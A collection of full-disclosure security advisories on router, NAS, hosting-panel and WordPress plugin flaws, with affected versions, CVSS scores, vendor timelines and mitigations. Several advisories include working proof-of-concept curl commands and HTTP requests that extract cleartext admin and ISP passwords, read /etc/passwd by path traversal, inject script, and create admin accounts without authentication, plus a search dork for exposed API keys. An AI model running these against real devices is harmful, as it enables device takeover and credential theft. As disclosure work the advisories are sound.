ASUSTOR NAS ADM - 3.1.0 Remote Command Execution, SQL Injections
initialization, which enables them to compromise end user data or gain root access on the appliance. ------- [Researchers] Kyle Lovett - (twitter - @SquirrelBuddha) Matthew Fulton (twitter - @haqur) https://www.purehacking.com/blog/matthew-fulton/ https://github.com/mefulton/CVE-2018-11510/
Wordpress Plugin Social-Stream - Exposure of Twitter API Secret Key and Token
Wordpress Plugin Social-Stream - Exposure of Twitter API Secret Keys
CWE-522 :Insufficiently Protected Credentials
Products:
Wordpress Social Stream
Versions 1.6.0 and lower
https://codecanyon.net/item/wordpress-social-stream/2201708
Social Network Tabs
Versions 1.7.4 and lower
https://codecanyon.net/item/social-network-tabs-for-wordpress/1982987
Fix:
Wordpress Social Stream, V 1.6.1
https://codecanyon.net/item/wordpress-social-stream/2201708
"WordPress Social Stream will combine all of your social network feeds into one
single network stream or create a single feed for multiple social
network profiles."
A weakness exists in the Wordpress plugin Social-Stream which exposes all four
Twitter API keys as parameters of a URL link on the webpage in which
the plugin widget
is rendered.
consumer_key
consumer_secret
oauth_access_token
oauth_access_token_secret
When the end user places the code in their HTML to embed a Twitter Stream feed,
it calls the file dcwp_twitter.php, where the Twitter API keys are stored.
Those keys are set as a variable, then are incorrectly echo'd onto the webpage.
===
$auth = new
dcwss_TwitterOAuth($consumer_key,$consumer_secret,$oauth_access_token,$oauth_access_token_secret);
$get = $auth->get( $rest, $params );
//print_r($get->errors);
} else {
echo $get;
}
===
The full and clear text URL is exposed similar to this:
http://example.com/wp-content/plugins/wordpress-social-stream/inc/dcwp_twitter.php?1=consumer_key&2=consumer_secret&3=access_key&4=access_secret
Google Dork
https://www.google.com/search?num=100=dcwp_twitter+text=0
Fix:
The vendor has issued a patch for the Wordpress Social Stream, V 1.6.1
available here:
https://codecanyon.net/item/wordpress-social-stream/2201708
It is not known whether a patch has been issued for Social Network Tabs plugin.
An important note, the keys will remain good even after the patch,
until the end user revokes the original keys and issues a new set.
Changing one's password will not mitigate this problem, however
setting the app to be read only in Twitter will mitigate an attackers
ability to post tweets or change profile pictures as them.
--
Timeline:
Vendor notified on 04/01/2017
Fix Complete on 04/06/2017
Disclosure Public 05/21/2017
Contact: Kyle Lovett krlov...@gmail.com
--
Easy Hosting Control Panel (EHCP) - Multiple Vulnerabilities
/setup.sh http:///ehcp/smtpd.cert http:///ehcp/smtpd.key http:///ehcp/ssh2.sh http:///ehcp/stats.php http:///ehcp/misc/importexport.php http:///ehcp/misc/mysqltroubleshooter.php http:///ehcp/misc/redirect_index.html http:///ehcp/misc/serverstatus.sh Access : Remote Complexity : Low CWE-256: Plaintext Storage of a Password CWE-200: Information Exposure CWE-592: Authentication Bypass Issues Timeline: In late February the Vendor was contacted via email, which was followed up with a full bug report at https://launchpad.net/ehcp. While the vendor did reply to acknowledge the bugs, no timeframe nor any other information was given for when a fix would be complete. Vendor did not respond to any further followup correspondence. There is no known work around at this time other than disabling EHCP suite completely, and switching to a more secure solution until these issues can be patched. While the gui interface mechanisms does an OK job locking down the masked url front end web calls it makes, the entire backend files which are being called, can be directly accessed, bypassing the need to use the GUI interface. Research Contact: Kyle Lovett March 29, 2016
Full Disclosure - DIR-652/DIR-835/DIR-855L/DGL-5500/DHP-1565 - Clear Text Password/XSS/Information Disclosure
The following five D-Link model routers suffer from several
vulnerabilities including Clear Text Storage of Passwords, Cross Site
Scripting and Sensitive Information Disclosure.
DIR-652
D-Link Wireless N Gigabit Home Router
DIR-835
D-Link Network DIR-835L Wireless N 750M Dual-band 802.11n 4Port Gigabit Router
DIR-855L -
D-Link Wireless N900 Dual Band Gigabit Router
DGL-5500
D-Link AC1300 Gaming Router
DHP-1565
D-Link Wireless N PowerLine Gigabit Router
Affected firmware - FW 1.02b18/1.12b02 or older
Access - Remote
Complexity - Low
Authentication - None
Impact - Full loss of confidentiality
-
Clear Text Password - CWE - CWE-316: Cleartext Storage of Sensitive Information
Authentication can be bypassed to gain access to the file
tools_admin.asp, which stores the devices admin password in plain
text, by adding a / to the end of the URL.
Proof of Concept for the DGL-5500, DIR-855L and the DIR-835:
curl -s http://IP/tools_admin.asp/ |awk '/hidden/
/admin_password_tmp/ /value/ {print $5}'
PoC for the DHP-1565 and DIR-652, the generic 'user' must be added.
curl -s http://IP/tools_admin.asp/ -u user:|awk '/hidden/
/admin_password_tmp/ /value/ {print $5}'
-
Cross Site Scripting - CWE - CWE-79: Improper Neutralization of User
Input / Return
For the file apply.cgi (apply_sec.cgi on the DGL-5500) the POST
param action suffers from a XSS vulnerability due to improper
neutralization of user input / return output.
PoC for DIR-855L, DIR-835, DHP-1565
http://IP/apply.cgi
POST
graph_code=Xsession_id=123456login_n=userlogin_name=8action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3Elog_pass=html_response_page=login_pic.asptmp_log_pass=gcode_base64=MTg0MzU%3D
HTTP/1.1
For the DGL-5500
http://IP/apply_sec.cgi
POST
graph_code=Xsession_id=123456login_n=userlogin_name=8action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3Elog_pass=html_response_page=login_pic.asptmp_log_pass=gcode_base64=MTg0MzU%3D
HTTP/1.1
-
Sensitive Information Disclosure - CWE - CWE-200: Information Exposure
The D-Link models DGL-5500, DIR-855L, DIR-835 suffer from a
vulnerability which an unauthenticated person can gain access the
sensitive files:
http://IP:8080/hnap.cgi and /HNAP1/ via:
curl -s curl -s http://IP:8080/HNAP1/
On the DIR-652 and DHP-1565, a user needs authentication first to
gain access to these files.
But more importantly, an unauthenticated user can browse directly to
http://IP/cgi/ssi/ which will offer a download of the device's ELF
MBS MIPS file. The file contains most of the devices internal working
structure and sensitive information. These particular routers use a
MSB EM_MIPS Processor and it does contain executable components.
The file can be accessed through at least one known cgi file, however
there maybe others. Although no known publicly working example exist
to my knowledge, unpatched devices are susceptible to injection of
malicious code and most likely susceptible to a payload which could
deploy a self-replicating worm.
-
These items were reported to D-Link on April 20th, and to US Cert on
April 21. D-Link does have patches available for all affected models,
and it is highly recommended to update the device's firmware as soon
as possible.
Vendor Links:
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10025
http://securityadvisories.dlink.com/security/
Research Contact - Kyle Lovett
May 21, 2014
D-Link DAP-1320 Wireless Range Extender Directory Traversal and XSS Vulnerabilities
D-Link's DAP-1320 Wireless Range Extender suffers from both a directory traversal and a XSS vulnerability on all firmware versions. (current v. 1.20B07) - Directory Traversal CWE-22: Path Traversal The POST param 'html_response_page' of apply.cgi suffers from a directory traversal vulnerability. The following example will display the contents of /etc/passwd: http://IP/apply.cgi Pragma: no-cache Cache-control: no-cache Content-Type: application/x-www-form-urlencoded POST html_response_page=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswdlogin_name=html_response_message=just_loginlog_pass=login_n=adminaction=do_graph_authtmp_log_pass=PANtmp_log_pass_auth=FRIEDgraph_code=0DEYsession_id=57687gcode_base64=8TEHPOO%3D HTTP/1.1 - XSS CWE-79: Cross Site Scripting The POST param 'html_response_page' of apply.cgi suffers from a XSS vulnerability. Example: http://IP/apply.cgi Pragma: no-cache Cache-control: no-cache Content-Type: application/x-www-form-urlencoded POST html_response_page=%3Cscript%3Ealert%28SquirrelLord%29%3B%3C%2Fscript%3Elogin_name=Huggyhtml_response_message=just_loginlog_pass=login_n=adminaction=do_graph_authtmp_log_pass=poptmp_log_pass_auth=goesgraph_code=joffreysession_id=57687gcode_base64=ZZTOPI%3D HTTP/1.1 - Vendor Link: http://support.dlink.com/ProductInfo.aspx?m=DAP-1320 Research Contact: K Lovett
Full Disclosure - Linksys EA2700, EA3500, E4200 and EA4500 - Authentication Bypass to Administrative Console
Vulnerable products : Linksys EA2700, EA3500, E4200, EA4500 Vulnerability: Due to an unknown bug, which occurs by every indication during the installation and/or upgrade process, port 8083 will often open, allowing for direct bypass of authentication to the classic Linksys GUI administrative console for remote unauthenticated users. If vulnerable, an attacker would have complete control of the routers administrative features and functions. On affected models by simply browsing to: http://IP:8083/ a user will be placed into the admin console, with no prompt for authentication. Moreover, by browsing to: http://IP:8083/cgi-bin/ the following four cgi scripts (often there are more depending on the firmware and model) can also be found. fw_sys_up.cgi override.cgi share_editor.cgi switch_boot.cgi It has been observed that Port 443 will show as open to external scans when the vulnerability exists, though not all routers with this open port are affected. On the http header for port 8083, for those affected, Basic Setup is the only item of note observed. An end user should not rely on the router's GUI interface for the status of remote access, as this bug is present when the console shows remote access as disabled. CVE ID: 2013-5122 CWE-288: Authentication Bypass Using an Alternate Path or Channel CVSS Base Score 10 CVSS Temporal Score 8.1 Exploitability Subscore: 10.0 Timeline: The vendor was first notified of this bug in July 2013, and several follow-up conversations have occurred since that time. Patches/Workaround: No known patches or official fixes exist, though some workaround fixes, including reinstallation of the firmware have been often shown to solve the issue. This is not an official workaround and it is strongly advised to contact Linksys support for additional information. Recommendations: - Scan for an open port 8083 from the WAN side of the router to check for this particular vulnerability. - Since an attacker has access to enable FTP service, USB drives mounted on those routers which have them, should be removed until an official fix is out or vulnerability of the router has been ruled out. Research Contacts: Kyle Lovett and Matt Claunch Discovered - July 2013 Updated - February 2014
ASUS RT Series Routers FTP Service - Default anonymous access
Five ASUS RT series routers suffer from a vendor vulnerability that default FTP service to anonymous access, full read/write permissions. The service, which is activated from the administrative console does not give proper instructions nor indications that the end user needs to manually add a user to the FTP access table. The vendor was first alerted to this issue in late June of 2012, and then four other times officially from July 2012 to December 2012. It was not until January of this year, when the editors for the Norwegian publication IDG/PC World went to ASUS that any official response came. This vulnerability has been exploited aggressively for sometime now, and as a rolling count which has been kept ongoing since July 2012, over 30,000 unique IP address, at one time or another have had their FTP service shared. The FTP services, when not secured, allows for full read/write access to any external storage devices attached to the usb drives on the router. The vendor has issued an official (beta) patch for the RT-AC68U as of mid-January, and plans on additional patches in the coming week. Models Include: RT-AC68U RT-AC56U RT-AC66U RT-N66U RT-N16 CWE-287: Improper Authentication CVSS v2 Vector (AV:N/AC:L/Au:N/C:C/I:C/A:N/E:H/RL:OF/RC:C) CVSS Base Score 9.4 Impact Subscore 9.2 Exploitability Subscore 10 CVSS Temporal Score 8.2 Overall CVSS Score 8.2 Many have reported malware being uploaded into the sync share folders, large amounts of unauthorized file sharing and most importantly the theft of entire hard drives of personal information. Over 7,300 units are still vulnerable to this weakness as of today. It is strongly urged that those with any of the above routers check to ensure that their FTP service has been secured. Links: https://www.asus.com/Networking/RTAC68U/#support http://www.idg.no/pcworld/article281004.ece http://www.thinkbroadband.com/news/6229-new-asus-router-firmware-to-fix-ftp-security-issue.html http://www.pcworld.com/article/2087180/asus-simplifies-router-configuration-to-protect-external-hard-drives.html Research Contact - Kyle Lovett Discovered - June, 2012
Re: ASUS RT Series Routers FTP Service - Default anonymous access
Correction: I meant to say 2013, not 2012. I apologize for the error. On Wed, Feb 12, 2014 at 4:29 PM, kyle Lovett krlov...@gmail.com wrote: Five ASUS RT series routers suffer from a vendor vulnerability that default FTP service to anonymous access, full read/write permissions. The service, which is activated from the administrative console does not give proper instructions nor indications that the end user needs to manually add a user to the FTP access table. The vendor was first alerted to this issue in late June of 2012, and then four other times officially from July 2012 to December 2012. It was not until January of this year, when the editors for the Norwegian publication IDG/PC World went to ASUS that any official response came. This vulnerability has been exploited aggressively for sometime now, and as a rolling count which has been kept ongoing since July 2012, over 30,000 unique IP address, at one time or another have had their FTP service shared. The FTP services, when not secured, allows for full read/write access to any external storage devices attached to the usb drives on the router. The vendor has issued an official (beta) patch for the RT-AC68U as of mid-January, and plans on additional patches in the coming week. Models Include: RT-AC68U RT-AC56U RT-AC66U RT-N66U RT-N16 CWE-287: Improper Authentication CVSS v2 Vector (AV:N/AC:L/Au:N/C:C/I:C/A:N/E:H/RL:OF/RC:C) CVSS Base Score 9.4 Impact Subscore 9.2 Exploitability Subscore 10 CVSS Temporal Score 8.2 Overall CVSS Score 8.2 Many have reported malware being uploaded into the sync share folders, large amounts of unauthorized file sharing and most importantly the theft of entire hard drives of personal information. Over 7,300 units are still vulnerable to this weakness as of today. It is strongly urged that those with any of the above routers check to ensure that their FTP service has been secured. Links: https://www.asus.com/Networking/RTAC68U/#support http://www.idg.no/pcworld/article281004.ece http://www.thinkbroadband.com/news/6229-new-asus-router-firmware-to-fix-ftp-security-issue.html http://www.pcworld.com/article/2087180/asus-simplifies-router-configuration-to-protect-external-hard-drives.html Research Contact - Kyle Lovett Discovered - June, 2012
ASUS AiCloud Enabled Routers 12 Models - Authentication bypass and Sensitive file/path disclosure
ASUS routers, which are enabled with the AiCloud service (SSL ports), are vulnerable to bypass of authentication and sensitive file disclosure. This vulnerability has been observed in all firmware versions, though the latest version increases the complexity of the attack. By sending a special crafted packet, an attacker can exploit a weakness in the software by calling a non existent file /smb.xml. This attack leads to sensitive path disclosure and directory traversal. On the latest 3.0.0.4.374.2xxx firmware versions, specifically in the the 66 and 68 series routers, have shown a weakness that may allow an attacker to exploit the /smb.xml vulnerability with a specially crafted packet to cause a short term denial of service to the AiCloud service. The full details were disclosed to the Vendor last month. There are no known patches or workarounds at this time other than turning off any remote access to the AiCloud service. This is not directly related to the clear text password disclosure made last July. Also, it is strongly advised that the password to the administrative side of the router be changed from the default, since hijacking the routers VPN service becomes trivial once access to the admin console is obtained. RT-AC68U Dual-band Wireless-AC1900 Gigabit Router RT-AC66R Dual-Band Wireless-AC1750 Gigabit Router RT-AC66U Dual-Band Wireless-AC1750 Gigabit Router RT-N66R Dual-Band Wireless-N900 Gigabit Router RT-N66U Dual-Band Wireless-N900 Gigabit Router RT-AC56U Dual-Band Wireless-AC1200 Gigabit Router RT-N56R Dual-Band Wireless-AC1200 Gigabit Router RT-N56U Dual-Band Wireless-AC1200 Gigabit Router RT-N14U Wireless-N300 Cloud Router RT-N14UHP Wireless-N300 Cloud Router RT-N16 Wireless-N300 Gigabit Router RT-N16R Wireless-N300 Gigabit Router Access Vector: Remote Access Complexity: High Authentication: None Confidentiality Impact: Partial Availability Impact: Partial CWE-400: Uncontrolled Resource Consumption CWE-208 Information Exposure Through Timing Discrepancy CWE-211 Information Exposure Through Externally-Generated Error Message CWE-289 Authentication Bypass by Alternate Name Product Pages: http://www.asus.com/Networking/ http://www.asus.com/support/ Research Contact - K Lovett Discovered - January, 2014
Full Disclosure - Multiple vulnerabilities in five Zoom ADSL Modem/Routers
Five models of the Zoom Telephonics ADSL Modem/Router line suffer from
multiple critical vulnerabilities, almost all being of a remote access
attack vector.
Models affected:
Zoom X3 ADSL Modem/Router
Zoom X4 ADSL Modem/Router
Zoom X5 ADSL Modem/Router
Zoom ADSL Bridge Modem Model 5715 (1 vulnerability)
Zoom USB ADSL Modem Model 5510B (1 vulnerability)
Timeline:
The vendor has not responded to our inquires concerning these
vulnerabilities. They were first reported on June 28th, 2013 and
partial disclosure was made on July 9, 2013.
Directory Traversal/Unauthenticated access to administrative panels
CVSS Base Score 9.7
Impact Subscore 9.5
Temporal Score: 8.3
(AV:N/AC:L/Au:N/C:P/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND)
CWE-22: Improper Limitation of a Pathname to a Restricted Directory
CVE-2013-5622 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X
2.2.X 2.5.X 3.2
CVE-2013-5627 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X
CVE-2013-5624 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X
2.2.X 2.5.X 3.0.X
By simply placing the following two URLs into a web browser, a
vulnerability will all models and firmware versions allow for bypass
of administrative credential challenge. All models and firmware
versions can access these pages with no authentication. An
un-authenticated user can preform almost all administrative tasks once
the authentication is bypassed.
http://IP/hag/pages/toc.htm (--Menu Banner)
http://IP/hag/pages/toolbox.htm (-Advanced Options Menu)
Improper handling of unexpected characters/data
CVSS Base Score 8.3
Impact Subscore 8.5
Temporal Score: 6.7
(AV:N/AC:M/Au:N/C:P/I:P/A:C/E:POC/RL:W/RC:UR)
CWE-241: Improper Handling of Unexpected Data Type
CVE-2013-5623 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X
2.2.X 2.5.X 3.2
CVE-2013-5628 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X
CVE-2013-5631 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X
2.2.X 2.5.X 3.0.X
CVE-2013-5632 - Zoom ADSL Bridge Modem Model 5715; all firmware versions
CVE-2013-5633 - Zoom USB ADSL Modem Model 5510B; all firmware versions
When an unexpected/illegal character is added to the end of any URL
which calls a value, such as http://IP/MainPage?id=25' the browser
will immediately redirect the browser to the System Status page
without authentication, where links to each interface (i.e.
eth-0,usb-0,etc) is both selectable whose properties can be edited.
Plain text storage of ISP/PPPoe usernames/passwords
CVSS Base Score 6.8
Impact Subscore 6.4
Temporal Score: 8.6
(AV:N/AC:M/Au:N/C:P/I:P/A:P/E:POC/RL:W/RC:UR)
CWE-311: Missing Encryption of Sensitive Data
CVE-2013-5620 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X
2.2.X 2.5.X 3.2
CVE-2013-5626 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X
CVE-2013-5629 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X
2.2.X 2.5.X 3.0.X
The following command will display the ISP usernames and passwords.
(The print value may vary slightly based on firmware.)
Proof of Concept
curl -s http://IP/MainPage?id=25 |egrep -i 'MacWanPasswd'|awk '{ print $8 }'
value=wanpasswd1 ('or similar')
curl -s http://IP/MainPage?id=25 |egrep -i 'MacWanUsrName'|awk '{ print $21 }'
value=u...@usersisp.net ('or similar')
Unauthenticated direct execution of administrative tasks
CVSS Base Score 10.0
Impact Subscore 10.0
Temporal Score: 8.6
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND)
CWE-285: Improper Authorization
CVE-2013-5621 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X
CVE-2013-5625 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X
CVE-2013-5630 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X
Administrative authentication can be bypassed and commands directly
executed with specially crafted commands.
Proofs of Concept -
Create New Acct Admin or Intermediate - (all PW and admin names are
'or similar')
http://IP/hag/emweb/PopOutUserAdd.htm?id=70user_id=newintermediateaccountpriv=v2pass1=123456pass2=123456cmdSubmit=Save+Changes
Clear Logs
http://IP/Action?id=76cmdClear+Log=Clear+Log
Fixes/Patches:
There are no known patches or fixes for these vulnerabilities at this time.
Workaround:
It is advised to turn off all remote administrative access to the
router. This
Update: Linksys EA2700, EA3500, E4200v2, EA4500 Unspecified unauthenticated remote access
- Vulnerabilities: An unspecified bug can cause an unsafe/undocumented TCP port to open allowing for: - Unauthenticated remote access to all pages of the router administration GUI, bypassing any credential prompts under certain common configurations - Direct access to several critical system files CVE-ID 2013-5122 CWE-288: Authentication Bypass Using an Alternate Path or Channel CVSS Base Score 10 CVSS Temporal Score 8.1 Exploitability Subscore: 10.0 Affected models and firmware: Linksys SMART Wi-Fi Router N600 - EA2700 Firmware Version: 1.0.14 Linksys SMART Wi-Fi Router N750 Smooth Stream EA3500 Firmware Version: 1.0.30 Linksys Maximun Performance N Router E4200v2 Firmware Version: 2.0.36 Linksys Maximun Performance N Router E4200v2 Firmware Version: 2.0.37 Linksys SMART Wi-Fi N900 Media Stream EA4500 Firmware Version: 2.0.36 Linksys SMART Wi-Fi N900 Media Stream EA4500 Firmware Version: 2.0.37 -Web Server Lighttpd 1.4.28 -Running - Linux 2.6.22 - Vulnerability Conditions seen in all variations, though not limited too: - Classic GUI has been enabled/installed - Remote Management - Disabled - UPnP - Enabled - IPv4 SPI Firewall Protection - Disabled Fixes and workarounds: *** It is strongly advised to those that have the classic GUI firmware installed to do a full WAN side scan for unusual ports that are open that weren't specifically opened by the end user. It is recommend to upgrade to firmware 2.1.39 on the E4200v2 and EA4500, though it is uncertain if this resolves the problem in all cases. It is recommend to upgrade to firmware 1.1.39 on the EA2700 and EA3500.though it is uncertain if this resolves the problem in all cases. Vendor: We have been working with Linksys/Belkin Engineers on this problem, and they are still investigating the root cause. We hope to have additional information on this bug soon. - External Links Misc: http://www.osvdb.org/show/osvdb/94768 http://www.securityfocus.com/archive/1/527027 http://securityvulns.com/news/Linksys/EA/1307.html http://www.scip.ch/en/?vuldb.9326 http://www.mobzine.ro/ionut-balan/2013/07/vulnerabilitate-majora-in-linksys-ea2700-ea3500-e4200-ea4500/ Vendor product links: http://support.linksys.com/en-us/support/routers/EA2700 http://support.linksys.com/en-us/support/routers/EA3500 http://support.linksys.com/en-us/support/routers/E4200 http://support.linksys.com/en-us/support/routers/EA4500 Discovered - 07-01-2013 Updated - 08-15-2013 Research Contact - K Lovett, M Claunch Affiliation - SUSnet
Full Disclosure - WD My Net N600, N750, N900, N900C - Plain Text Disclosure of Admin Credentials
Vulnerable Products - WD My Net N600 HD Dual Band Router Wireless N WiFi Router Accelerate HD WD My Net N750 HD Dual Band Router Wireless N WiFi Router Accelerate HD Linux 2.6.3 Kernel Firmware Ver. 1.03.xx 1.04.xx Firmware unaffected Ver 1.01.xx WD My Net N900 HD Dual Band Router Wireless N WiFi Router Accelerate HD WD My Net N900 Central HD Dual Band Router 2TB Storage WiFi Wireless Router Firmware Ver. 1.05.xx 1.06.xx Version 1.07.16 released on 05/2013 does not have this bug Firmware unaffected Ver. 1.01.xx 1.02.xx 1.03.xx -- Vulnerabilities - On the WD My Net N600, N750, N900 and N900C routers, administrative credentials are stored in plain text and are easily accessible from a remote location via port 8080 on the WAN side of the router. On those routers affected by the bug, the following command will display the password value that openly resides in their php source code: curl -s http://IP:8080/main_internet.php? -L | egrep -i 'var pass' During initial setup, the page main_internet.php will store in plain text the admin password as a value of var pass. Port 8080 is shared by both the UPnP modules and WAN side HTTP web services which remote administrative access is set to by default. The inherent difficulty with writing code to fit the unique requirements for authentication based tasks (administrative) on the same port as services that are privileged (UPnP), is quite apparent in the complexity with which each service is called on these units. Indeed, several of the developers comments inside the code, as well as warnings to the end user on the admin GUIs are made concerning this conflict and the risks involved. For example, in one line commented out speaking on an api function they state: /* 80, 443 ports can not use*//api/1.0/rest/device?owner=adminpw=name= + hostname + rest_method=PUT; Again, under code to start certain features that call UPnP services, it warns the end user: Conflict with Remote Management service HTTP port+: +XG(XMLrm+/web)+. +This may cause unpredictable problem. Are you sure you want to override? In fact, when a call is made to change the password for the admin user, or to authenticate a remote administrative user access, a php or cgi action will call one of several modules services built into UPnP, in this case DEVICE.ACCOUNT. Ex: - Changing the password for admin will issue the following series of commands: /tools_admin.php -- /getcfg.php (SERVICES=DEVICE.ACCOUNT%2CHTTP.WAN-1%2CALERTMSG)-- hedwig.cgi (which posts the privlidged postxml module for serviceDEVICE.ACCOUNT/service) -- /pigwidgeon.cgi (ACTIONS=SETCFG%2CSAVE%2CACTIVATE) -- /getcfg.php(sets the new cookie value, and finalizes the action) Conditions - UPnP and remote administrative access must be enabled for the bug to be activated. --- Vendor Timeline- Western Digital has not returned any inquires that have been made regarding the bug. Patches of Fixes- On WD My Net N900 and N900C It is advised that users upgrade to Firmware Version 1.07.16. On WD My Net N600 and N750 If a restoration to Ver. 1.01.xx firmware is available, and remote access via the internet is a required feature, it is advised to contact vendor support for how best to proceed. Mitigation and Workarounds for those who aren't able to upgrade to downgrade firmware - Turn off all remote administrative access to the router Disable UPnP services Change the default username and password Note: Critical vulnerabilities discovered on UPnP enable routers and other devices, that have visibility and access to the WAN, have continued to rise at a very rapid pace over the past year. During Defcon 19 Daniel Garcia gave a talk about UPnP Port mapping, the risks involved with the unpredictable nature of UPnP stacks and the danger that NAT traversal could be a possible outcome. http://toor.do/DEFCON-19-Garcia-UPnP-Mapping-WP.pdf Back in January of this year, the security researcher at Rapid7, HDMoore had written a white paper on UPnP vulnerabilities, warning that around 40-50 million network-enabled devices are at risk which he explains includes devices such as routers, printers, network-attached storage (NAS), media players and smart TVs. https://community.rapid7.com/docs/DOC-2150 In each of the devices he mentions, we have seen some exploitable vulnerabilities begin to surface, and even in some devices not mentioned yet such as DVRs and IP Web Cameras. A few vendors have been able to sufficiently mitigate the risks of UPnP/DLNA services co-existing with their products supporting remote access capabilities, however, many have not. The growing list of home router or modem models that are still vulnerable to a known
Western Digital My Net N600, N750, N900 and N900C - Plain text disclosure of administrative credentials
Vulnerable Products - WD My Net N600 HD Dual Band Router Wireless N WiFi Router Accelerate HD WD My Net N750 HD Dual Band Router Wireless N WiFi Router Accelerate HD Linux 2.6.3 Kernel All firmware including the latest Ver. 1.04.16 WD My Net N900 HD Dual Band Router Wireless N WiFi Router Accelerate HD WD My Net N900 Central HD Dual Band Router 2TB Storage WiFi Wireless Router Firmware 1.06 and below - Version 1.07.16 released on 05/2013 fixes the bug for the N900 and N900C Vulnerabilities - Due to a unspecified bug in the WD My Net N600, N750, N900 and N900C routers, administrative credentials are stored in plain text and are easily accessible from a remote location on the WAN side of the router. Note: In addition, hidden elements of the administrative GUI can be revealed on all the routers with a few trivial actions. It is not known at this time if changes to the admin console can be successful made through the revealed elements. Conditions - UPnP and remote administrative access must be enabled for the bug to be activated. Vendor Timeline- Western Digital has not returned any inquires that have been made regarding the bug. Patches of Fixes- On WD My Net N900 and N900C It is advised that users upgrade to Firmware Version 1.07.16, which fixes the bug on these two routers. On WD My Net N600 and N750 There are no known patches or fixes available at this time. Mitigation and Workarounds- On N900 and N900C Upgrade to Firmware Version 1.07.16 WD My Net N600 and N750 Turn off all remote administrative access to the router Disable UPnP services Change the default username and password Discovered - 07-02-2013 Research Contact - K Lovett Affiliation - SUSnet
Full Disclosure ASUS Wireless Routers Ten Models - Multiple Vulnerabilities on AiCloud enabled units
Note: In June I released a partial disclosure for just the RT-N66U on the issue of directory traversal. I have only heard back from ASUS a twice on the issue, and I understand they are working on a fix. However, no serious attempt to our knowledge has been made to warn their customers in the meantime, even after multiple requests from several different security professionals. Nor has ASUS posted a disclosure of these serious issues to new potential customers on their AiCloud web adverts, since they still advertise the product as an add-on with these routers, as a safe and bug free home cloud solution. Linux 2.6.xx kernel All firmware versions known --- Vulnerable Asus Models RT-AC66R Dual-Band Wireless-AC1750 Gigabit Router RT-AC66U Dual-Band Wireless-AC1750 Gigabit Router RT-N66R Dual-Band Wireless-N900 Gigabit Router with 4-Port Ethernet Switch RT-N66U Dual-Band Wireless-N900 Gigabit Router RT-AC56U Dual-Band Wireless-AC1200 Gigabit Router RT-N56R Dual-Band Wireless-AC1200 Gigabit Router RT-N56U Dual-Band Wireless-AC1200 Gigabit Router RT-N14U Wireless-N300 Cloud Router RT-N16 Wireless-N300 Gigabit Router RT-N16R Wireless-N300 Gigabit Router - Vulnerabilities - Due in large part to an exposed $root share on the NVRAM for Samba service, which was discovered in March of this year by another researcher, on almost all of the above models that have enabled AiCloud service, the end users will find themselves exposed to multiple methods of attack and several dangerous remote exploits. Since authentication can be simply bypassed on the those units running HTTPS WebDav via directory traversal, access to all files which control services on either side of the router are wide open to remote manipulation. All pem and key files are also openly available. Credentials- Almost all models will disclose a clear text creational file, making any MD5 hashing on the /etc/shadow file meaningless. This file below remains easily accessible, and has no encryption. It may vary a bit in where it sits on a small percentage of routers configured a certain way. (The -L and -v switches are optional) curl -v https://IP/smb/tmp/$dir/lighttpd/permissions -k -L or curl -v https://IP/smb/tmp/lighttpd/permissions -k -L PPTP Tunnel- VPN service can be enabled, configured and connected by altering a five small files on any of the four models of the RT66 series routers. Everything needed to achieve this can be found in the directory at /smb/tmp/$dir/pptpd, and the pptpctrl file as well as pptpd service are in the /sbin dir. Local executable or modifiable scripts- The files needed to create a Dropbear ssh service can be found at /smb/tmp/etc/dropbear/ with its pid sitting in /var. In /smb/tmp/bin and /smb/tmp/sbin sit well over a dozen executables such as netcat, ftpget, logger, wol, tr and sendmail. Several services, two of which being /smb/sbin/vsftpd and /smb/sbin/telnetd can be configured or altered there too. Other shell scripts, not native to the routers, can be uploaded and used in an attack with little difficulty. On the RT-N16 and N16R, once the https credentials are entered, an attacker can easily move to the admin console on the LAN side by changing the path to /index.asp. While the list of tools available to an attacker might seem endless, there is no doubt that once the AiCloud service is enabled, it would take just one person a few minutes to completely control of all traffic coming in and out of the LAN, gain access to all LAN side resources by a VPN or through another service, and could choose to sniff packets, do a hard DoS or launch attacks on other systems. Mitigation and Workarounds- Disable all UPnP services Disable any and all of the three AiCloud items which will open the vulnerability Remove any remote access to the router for administration until 